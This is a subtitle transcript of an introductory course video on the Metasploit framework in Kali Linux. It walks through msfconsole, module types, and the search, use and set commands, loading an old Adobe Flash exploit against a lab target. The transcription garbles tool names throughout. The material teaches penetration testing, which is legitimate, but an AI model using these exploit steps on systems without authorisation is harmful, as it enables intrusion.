1
00:00:00,180 --> 00:00:02,880
Welcome to part one of this module.

2
00:00:02,880 --> 00:00:09,480
In this section we're going to be studying the a split framework which comes pre installed in Cali Linux

3
00:00:09,900 --> 00:00:17,190
as well as Armitage which is a graphical front end for metal split because of the complexity of these

4
00:00:17,190 --> 00:00:18,230
applications.

5
00:00:18,240 --> 00:00:25,290
This module will focus exclusively on them and will be divided up into several different videos starting

6
00:00:25,290 --> 00:00:31,320
with a basic introduction and explanation of what Metis split actually is.

7
00:00:31,380 --> 00:00:38,370
Will I normally try to keep each individual application confined to a standalone video that really isn't

8
00:00:38,370 --> 00:00:40,770
possible in the case of met a split.

9
00:00:40,770 --> 00:00:47,070
So it is recommended that you follow the videos presented in this module in order and if you have been

10
00:00:47,070 --> 00:00:52,740
following all of these videos in order one after another you may have just arrived from the section

11
00:00:52,740 --> 00:00:56,440
covering Wi-Fi hacking and radio based attacks.

12
00:00:56,460 --> 00:01:03,620
If so I'll mention that it is perfectly okay to use a virtual box installation of Kali for this module.

13
00:01:03,690 --> 00:01:09,670
In fact most if not all of the demonstrations will be done in virtual box.

14
00:01:09,690 --> 00:01:16,380
However please keep in mind that virtual box is significantly slower than a fully installed version

15
00:01:16,380 --> 00:01:20,760
of Kali or just running it off a USP with persistence.

16
00:01:20,760 --> 00:01:26,820
There are a few things we can do to make met a split run a little faster but if you choose to use virtual

17
00:01:26,820 --> 00:01:30,890
box please keep in mind the need for patience.

18
00:01:30,920 --> 00:01:37,500
I also need to open by saying that once again we will be using the metal split able to virtual system

19
00:01:37,890 --> 00:01:44,300
as the target for all of our attacks using Metis Floyd for more detailed instructions on how to set

20
00:01:44,300 --> 00:01:46,370
up such a virtual system.

21
00:01:46,380 --> 00:01:53,330
Please refer back to the first module which covers setting up the lab and because I'm required to say

22
00:01:53,330 --> 00:02:00,080
this I must once again remind you to never use this or any other tool seen in any of these demonstrations

23
00:02:00,140 --> 00:02:02,390
in any sort of unlawful manner.

24
00:02:02,450 --> 00:02:07,640
Never use them against a system that you do not personally own or have written permission from the owner

25
00:02:07,640 --> 00:02:09,670
to penetration test.

26
00:02:09,710 --> 00:02:17,840
All right so what is met a split met a split is the leading exploitation framework.

27
00:02:17,840 --> 00:02:22,840
It is used by nearly every Penetration Tester an ethical hacker out there.

28
00:02:22,880 --> 00:02:28,930
It was developed by a group called rapid 7 a company that owns a lot of different vulnerability scanners

29
00:02:29,360 --> 00:02:36,530
and it is well worth looking them up when you have a little free time Metis Floyd is basically the premier

30
00:02:36,530 --> 00:02:43,370
tool kit that hackers use to hack systems and no lawful penetration tester can afford not to study it

31
00:02:43,790 --> 00:02:47,930
in a moment we're going to look over the metal split interfaces.

32
00:02:47,930 --> 00:02:55,610
You may recognize some that we have seen already over the course of this class albeit in other forms.

33
00:02:55,850 --> 00:03:02,420
We will be starting out with the MSF console which is the command line interface for Metis Boyd and

34
00:03:02,420 --> 00:03:09,710
then we will work our way up to Armitage which is a graphical user interface or G UI framework that

35
00:03:09,710 --> 00:03:13,130
allows you to use metal exploited more conveniently.

36
00:03:13,130 --> 00:03:18,650
The first thing to understand is that Mitt exploited needs to be setup correctly or else it is going

37
00:03:18,650 --> 00:03:21,160
to be needlessly slow.

38
00:03:21,170 --> 00:03:25,370
Now we could just launch it directly by going to applications

39
00:03:27,700 --> 00:03:35,190
exploitation tools and clicking on metal split or from the Kelly Linux sidebar.

40
00:03:35,410 --> 00:03:36,600
But let's do this right.

41
00:03:37,810 --> 00:03:40,390
So we're gonna begin by opening up a terminal window

42
00:03:43,780 --> 00:03:48,860
and we're going to start the post grass Eskew well data service.

43
00:03:48,940 --> 00:03:55,690
What this will do is allow Metis ploy to run faster searches as well as allow Metis ploy to store the

44
00:03:55,690 --> 00:04:00,310
information while you are performing scanning and exploitation.

45
00:04:00,310 --> 00:04:07,090
It is not as I said an absolute requirement but it is a good practice for efficiency.

46
00:04:07,090 --> 00:04:10,970
So let's do that now.

47
00:04:11,080 --> 00:04:13,870
Service post Gris.

48
00:04:13,960 --> 00:04:16,480
Q Well start.

49
00:04:16,480 --> 00:04:22,720
Keep in mind this will take a moment and if you are in a virtual box it may take several moments for

50
00:04:22,720 --> 00:04:24,770
the service to start.

51
00:04:24,940 --> 00:04:31,900
Now with that done we could just load directly into met a split but I'm going to suggest running one

52
00:04:31,900 --> 00:04:33,300
more command.

53
00:04:33,700 --> 00:04:39,610
The very first time that you run Metis Floyd it is going to need to build a database and it is going

54
00:04:39,610 --> 00:04:41,910
to take quite a long time.

55
00:04:41,920 --> 00:04:48,580
This won't be required every time that you run Metis Floyd sometimes the database cachet does not get

56
00:04:48,580 --> 00:04:52,930
built correctly and this can result in slow searches.

57
00:04:52,930 --> 00:04:58,690
If this is your first time running Meadows Floyd I suggest that you run the following command.

58
00:04:59,290 --> 00:05:05,900
M S F D.B. I n i t.

59
00:05:06,140 --> 00:05:09,590
In my case the database is already started and configured.

60
00:05:09,620 --> 00:05:13,940
And if you get that message great move on and don't worry about it.

61
00:05:14,120 --> 00:05:21,050
Otherwise this will begin building the database which may take quite some time but it is a good investment

62
00:05:21,050 --> 00:05:28,160
of time to get this done now rather than having to perpetually deal with slow searches within the framework

63
00:05:29,730 --> 00:05:31,550
once that's done.

64
00:05:31,680 --> 00:05:40,460
We're going to type M S F console to begin loading met spoiled if you chose to start the posts the post

65
00:05:40,490 --> 00:05:41,550
Press Service.

66
00:05:41,550 --> 00:05:49,200
This will load faster but it always takes some time for this to come up particularly in virtual box.

67
00:05:49,200 --> 00:05:55,980
And again please bear in mind that the first time that you're running met a split the load time is going

68
00:05:55,980 --> 00:06:00,160
to be very slow as it's going to be building these databases.

69
00:06:00,600 --> 00:06:06,510
Once the console does finally finish loading you'll be treated to one of a dozen or so random banners

70
00:06:06,900 --> 00:06:09,690
possibly containing some ASCII art.

71
00:06:09,780 --> 00:06:15,810
These banners are quite amusing but some of them confuse new users because they make it appear that

72
00:06:15,810 --> 00:06:22,860
met a spoilt failed to load correctly they can take the form of a joke error message that are actually

73
00:06:22,860 --> 00:06:26,430
references to old movies and video games about hacking.

74
00:06:26,580 --> 00:06:32,460
But if you don't know the reference you might be thinking that the framework crashed since the banner

75
00:06:32,460 --> 00:06:35,960
is random and different versions have different banners.

76
00:06:35,970 --> 00:06:41,280
I don't really know for sure what you'll be presented with when you first load up Metis Floyd but as

77
00:06:41,280 --> 00:06:48,330
long as you see this bit here at the bottom you can be confident that Metis Floyd is working correctly

78
00:06:50,510 --> 00:06:54,260
also notice that the prompt is changed to MSF.

79
00:06:54,290 --> 00:07:00,230
I want to point out that if you watch the video on recon energy a lot of things about this framework

80
00:07:00,230 --> 00:07:02,550
are going to look very familiar to you.

81
00:07:02,580 --> 00:07:10,170
This is no accident as recon energy was designed to be very similar to metal split all right.

82
00:07:10,280 --> 00:07:17,630
Once again I'm going to suggest an optional command if this is your first time using metal spoiled your

83
00:07:17,630 --> 00:07:21,560
database cachet may not have been built properly.

84
00:07:21,560 --> 00:07:29,630
We have the MSF prompt which means we are in the MSF console so I suggest running the following command

85
00:07:30,050 --> 00:07:37,370
D.B. underscore rebuild underscore cachet.

86
00:07:37,380 --> 00:07:43,500
This gives us a message about purging and rebuilding the module cachet in the background while we work.

87
00:07:43,500 --> 00:07:49,320
As I said this is not absolutely necessary but using this command is how we fix any problems with the

88
00:07:49,320 --> 00:07:55,530
cachet that can result in slow searches and it should only be necessary to do this.

89
00:07:55,530 --> 00:08:00,830
The very first time that you load met a split not every time you load met Boyd.

90
00:08:01,320 --> 00:08:05,670
But if you run into any problems by all means run the command again.

91
00:08:05,730 --> 00:08:13,140
In any case now that we're up and running we'll begin by looking at the Met a split keywords menace

92
00:08:13,140 --> 00:08:19,530
Floyd has six type of modules although we will mostly be using just four of them.

93
00:08:19,650 --> 00:08:36,080
Briefly put it has exploits auxiliary post payloads encoders and knobs and exploit is a module that

94
00:08:36,080 --> 00:08:39,020
will take advantage of a system vulnerability.

95
00:08:39,020 --> 00:08:43,100
This is why reconnaissance of our targets is so important.

96
00:08:43,100 --> 00:08:49,910
Just because we know an exploit exists for a particular operating system application it won't do us

97
00:08:50,000 --> 00:08:50,860
any good.

98
00:08:50,870 --> 00:08:57,660
If that vulnerability has already been patched we've seen how to find these vulnerabilities in prior

99
00:08:57,660 --> 00:08:58,500
modules.

100
00:08:58,530 --> 00:09:03,030
And this is the class of tools that allow you to attack them.

101
00:09:03,060 --> 00:09:08,520
Usually these exploits seek to install a payload on the target system.

102
00:09:08,520 --> 00:09:15,090
These payloads typically take the form of a reverse shell or a mature splitter giving you direct access

103
00:09:15,090 --> 00:09:16,420
to that computer.

104
00:09:16,560 --> 00:09:24,570
In other contexts payloads are often referred to as root kits or somewhat more broadly as remote access

105
00:09:24,570 --> 00:09:33,330
tools auxiliary modules are sort of a catchall class for things like port scanners phasers sniffers

106
00:09:33,450 --> 00:09:40,080
and the like encoders ensure that payloads make it to their destination intact.

107
00:09:40,080 --> 00:09:44,170
This is a little hard to explain in a coherent way at this stage.

108
00:09:44,160 --> 00:09:50,610
The tutorial because it can seem overly technical and overwhelming but this should become more clear

109
00:09:50,640 --> 00:09:56,940
as we go along and not just keep payload sizes consistent across exploit attempts.

110
00:09:56,940 --> 00:10:05,070
This should also become more clear as we go along so the very best command to remember in metal spoiled

111
00:10:05,340 --> 00:10:07,740
is unsurprisingly the help command

112
00:10:14,300 --> 00:10:21,930
if we open this up we can see a long list of examples and commands that can seem quite overwhelming.

113
00:10:22,210 --> 00:10:25,090
But don't try to figure it all out right now.

114
00:10:25,090 --> 00:10:31,630
Just remember that this exists as a reference for you to go back to at any point.

115
00:10:31,630 --> 00:10:37,870
As we go along if you get confused if you find yourself getting lost or trying to do something outside

116
00:10:37,870 --> 00:10:44,080
of the bounds and scope of this tutorial and the help file itself is not enough to answer your question.

117
00:10:44,170 --> 00:10:49,030
Use it as a starting point for your web searches and there is a good chance you'll find what you're

118
00:10:49,030 --> 00:10:50,940
looking for.

119
00:10:50,980 --> 00:10:51,820
All right.

120
00:10:52,090 --> 00:10:55,490
So now let's look at the use.

121
00:10:55,480 --> 00:10:56,790
Command again.

122
00:10:56,800 --> 00:11:01,750
If you watched the recon energy video this is going to seem very familiar to you.

123
00:11:01,810 --> 00:11:09,700
If not briefly what use does is it allows you to load up a particular module within the framework for

124
00:11:09,700 --> 00:11:15,850
this example let's say that we have a target system and we have detected that it is vulnerable to an

125
00:11:15,910 --> 00:11:19,740
old adult Adobe Flash plugin exploit.

126
00:11:19,810 --> 00:11:24,270
So we're going to use the use command then from here.

127
00:11:24,280 --> 00:11:32,070
The path follows a certain logic we specify that we want to use an exploit forward slash.

128
00:11:32,170 --> 00:11:37,190
Then we add in Windows because it is a Windows exploit.

129
00:11:37,300 --> 00:11:45,490
Then we add in forward slash browser and another forward slash and include the name for the browser

130
00:11:45,520 --> 00:11:46,720
exploit.

131
00:11:46,720 --> 00:11:53,480
So in this case it's going to be a dobie underscore flash underscore AVM too.

132
00:11:53,560 --> 00:11:55,590
It's all going to look like this.

133
00:11:55,690 --> 00:11:58,280
Use exploits.

134
00:11:58,390 --> 00:11:58,830
Sorry.

135
00:12:00,740 --> 00:12:05,240
Exploit forward slash windows forward slash

136
00:12:08,290 --> 00:12:21,330
browser forward slash Adobe underscore flash underscore AVM to hit enter and right away we notice that

137
00:12:21,330 --> 00:12:22,970
the prompt is changed.

138
00:12:22,980 --> 00:12:29,520
This tells us that the exploit we want to work with is now loaded up in any commands we run from here

139
00:12:29,760 --> 00:12:32,260
will apply to the exploit itself.

140
00:12:32,370 --> 00:12:37,330
The module name being displayed in red means that it is ready for use.

141
00:12:37,380 --> 00:12:44,280
The first thing we want to do is type the show command and this will give us information about the module

142
00:12:44,280 --> 00:12:49,630
itself since we didn't provide any sort of argument to this command.

143
00:12:49,630 --> 00:12:55,000
It is going to show us everything there is to see and this will seem very overwhelming.

144
00:12:55,000 --> 00:13:03,310
But don't worry about it and do please be patient as this will be somewhat slow to pop up for larger

145
00:13:03,310 --> 00:13:04,990
exploits like this.

146
00:13:05,020 --> 00:13:10,450
We need to know about the show command for circumstances where we need to check something specific about

147
00:13:10,450 --> 00:13:16,260
the module itself but for the most part we don't really need to know all of this.

148
00:13:16,360 --> 00:13:24,220
Needless to say that was a lot to take in a better and more digestible thing to do is to use the show

149
00:13:24,370 --> 00:13:27,300
options command.

150
00:13:27,320 --> 00:13:32,990
This will give us options for the module that we're working with that we can customize depending on

151
00:13:32,990 --> 00:13:35,450
the method of exploitation.

152
00:13:35,450 --> 00:13:43,160
In this case we have server host the server port the SSL certificate etc. Every exploit will have certain

153
00:13:43,160 --> 00:13:45,290
options that you can change.

154
00:13:45,380 --> 00:13:49,030
This will become more clear later.

155
00:13:49,250 --> 00:13:57,010
Next we'll have a look at these show payloads command and this will probably take a few seconds particularly

156
00:13:57,010 --> 00:13:59,070
in virtual box.

157
00:13:59,110 --> 00:14:01,890
These are all the payloads that we can load.

158
00:14:01,930 --> 00:14:06,210
Each one gives us a different way of approaching an attack.

159
00:14:06,220 --> 00:14:13,000
This will show you all the payloads that are compatible with this particular exploit.

160
00:14:13,020 --> 00:14:17,450
Another one is the show Target's command.

161
00:14:17,640 --> 00:14:20,940
In this case none are set with different exploits.

162
00:14:20,940 --> 00:14:26,220
You can have multiple targets and it's important to get this right.

163
00:14:26,240 --> 00:14:36,700
This will be elaborated on a bit later and next we look at the show info command and this gives us general

164
00:14:36,700 --> 00:14:40,720
information about what the module itself is supposed to do.

165
00:14:41,380 --> 00:14:48,610
So in this case if we read what is written here this module exploits of vulnerability found the active

166
00:14:48,640 --> 00:14:56,170
x component of Adobe Flash Player before a certain version no by supplying a specifically crafted s

167
00:14:56,500 --> 00:15:04,840
w f file it is possible to trigger an integer under flow in several AVM to instructions which can be

168
00:15:04,840 --> 00:15:09,270
turned into remote code execution under the context of the user.

169
00:15:09,310 --> 00:15:11,380
So on and so on.

170
00:15:11,380 --> 00:15:18,220
In other words if your target is running a version of Adobe Flash Player older than version twelve point

171
00:15:18,220 --> 00:15:25,840
zero point zero point four three This module will attempt to exploit this integer under flow bug to

172
00:15:25,840 --> 00:15:31,810
run a payload on the target system in the background and make it appear that this to the system that

173
00:15:31,810 --> 00:15:34,990
the user of the system is the one running it.

174
00:15:34,990 --> 00:15:42,670
In other words it can install for example a remote access package and make it seem to the system as

175
00:15:42,670 --> 00:15:51,060
if the user was the one who did it thus bypassing many or all security defensive measures.

176
00:15:51,130 --> 00:15:58,480
Of course this is a very old exploit and will not work on flash player versions past twelve point zero

177
00:15:58,480 --> 00:16:00,340
point zero point for three.

178
00:16:00,460 --> 00:16:05,860
But this is just an example chosen to give you an idea of how this process works.

179
00:16:06,100 --> 00:16:12,070
You detect what your target is vulnerable against during a reconnaissance phase and then you find the

180
00:16:12,070 --> 00:16:16,800
appropriate exploit within the Met a spoilt framework to go after it.

181
00:16:16,870 --> 00:16:24,100
And this leads us nicely to the MSF search command because once you found something on a target machine

182
00:16:24,100 --> 00:16:30,970
that you want to exploit you need to find the appropriate exploit for it within met a spoiled men exploit

183
00:16:31,000 --> 00:16:33,320
has a lot of modules.

184
00:16:33,430 --> 00:16:36,890
So finding the right one can be quite time consuming.

185
00:16:37,120 --> 00:16:46,450
The syntax is going to contain keywords such as we have already seen the first will be platform then

186
00:16:46,450 --> 00:16:55,450
the type of module such as for example an exploit or a payload and then finally the specific name that

187
00:16:55,450 --> 00:16:57,090
we're looking for.

188
00:16:57,160 --> 00:17:03,120
First we're going to exit out of the current module and return to the MSF console for this.

189
00:17:03,120 --> 00:17:04,990
We'll use the back command

190
00:17:08,900 --> 00:17:14,690
notice that unloaded the module and our prompt just says MSF again.

191
00:17:14,690 --> 00:17:24,500
Now from here what this is going to look like is search type colon exploit.

192
00:17:24,740 --> 00:17:33,200
We'll give it a space platform colon windows and another space flash.

193
00:17:33,200 --> 00:17:38,180
This will eventually give us a list of all exploits that will fit the bill.

194
00:17:38,270 --> 00:17:46,740
Incidentally if you received any sort of a warning about searches being slow due to the database cachet.

195
00:17:46,850 --> 00:17:54,770
This is why it is important to run that D.B. underscore rebuild underscore cachet command the very first

196
00:17:54,770 --> 00:17:57,010
time we load up Metis Floyd.

197
00:17:57,140 --> 00:18:01,940
That should fix any sort of problem with slow searches that you might get.

198
00:18:01,940 --> 00:18:10,660
So now if we scroll up we can see that the exploit we just used is listed near the top notice that they

199
00:18:10,660 --> 00:18:13,940
are sorted by name with the date of disclosure.

200
00:18:14,020 --> 00:18:24,300
The rank and general description so we'll just copy the one we want which in this example is the one

201
00:18:24,300 --> 00:18:26,050
we were just using.

202
00:18:26,340 --> 00:18:31,340
And from here we'll use the use command.

203
00:18:31,380 --> 00:18:35,820
We'll go ahead and paste that in and we'll do show options

204
00:18:38,880 --> 00:18:43,280
and now we want to set some of these options that is very easy.

205
00:18:43,290 --> 00:18:45,950
We will just use the set command to do it.

206
00:18:45,990 --> 00:18:56,180
For example if you wanted to set the server port it would be set aside of the port.

207
00:18:56,320 --> 00:19:00,010
Forgive my typing set SRB port 80

208
00:19:02,710 --> 00:19:12,320
Another example might be that we want to set the server host so we'll use set S R v host 10 dot 0 1

209
00:19:12,370 --> 00:19:21,250
0 dot eleven which in this case is the local IP address of my met a splitter ball to machine on my network

210
00:19:24,110 --> 00:19:31,340
now to launch the exploit we simply type exploit and I've gone ahead and used control seed interrupt

211
00:19:31,340 --> 00:19:39,350
this because I'm getting into using these exploits for another video and I don't think I properly configured

212
00:19:39,380 --> 00:19:46,190
the port but the point is this is how you would do it you simply set the options you give it the target

213
00:19:46,730 --> 00:19:49,760
and then you type the exploit command.

214
00:19:49,760 --> 00:19:58,630
OK so once again we use the back command to get the MSF console and last but not least the exit command

215
00:19:58,660 --> 00:20:05,190
to shut down met a split and get back to the regular command prompt.

216
00:20:05,310 --> 00:20:06,330
All right.

217
00:20:06,590 --> 00:20:09,240
That'll about do it for this introductory video.

218
00:20:09,260 --> 00:20:12,760
I hope this wasn't too overwhelming or confusing.

219
00:20:12,770 --> 00:20:18,710
This is a very complex subject but hopefully as we go along and there are more practical examples of

220
00:20:18,710 --> 00:20:25,100
using some of these exploits and other tools the concepts and commands will begin to make a little bit

221
00:20:25,100 --> 00:20:26,440
more sense.

222
00:20:26,470 --> 00:20:29,490
We have to learn to walk before we can run.

223
00:20:29,540 --> 00:20:31,700
Thank you for your patience and your attention.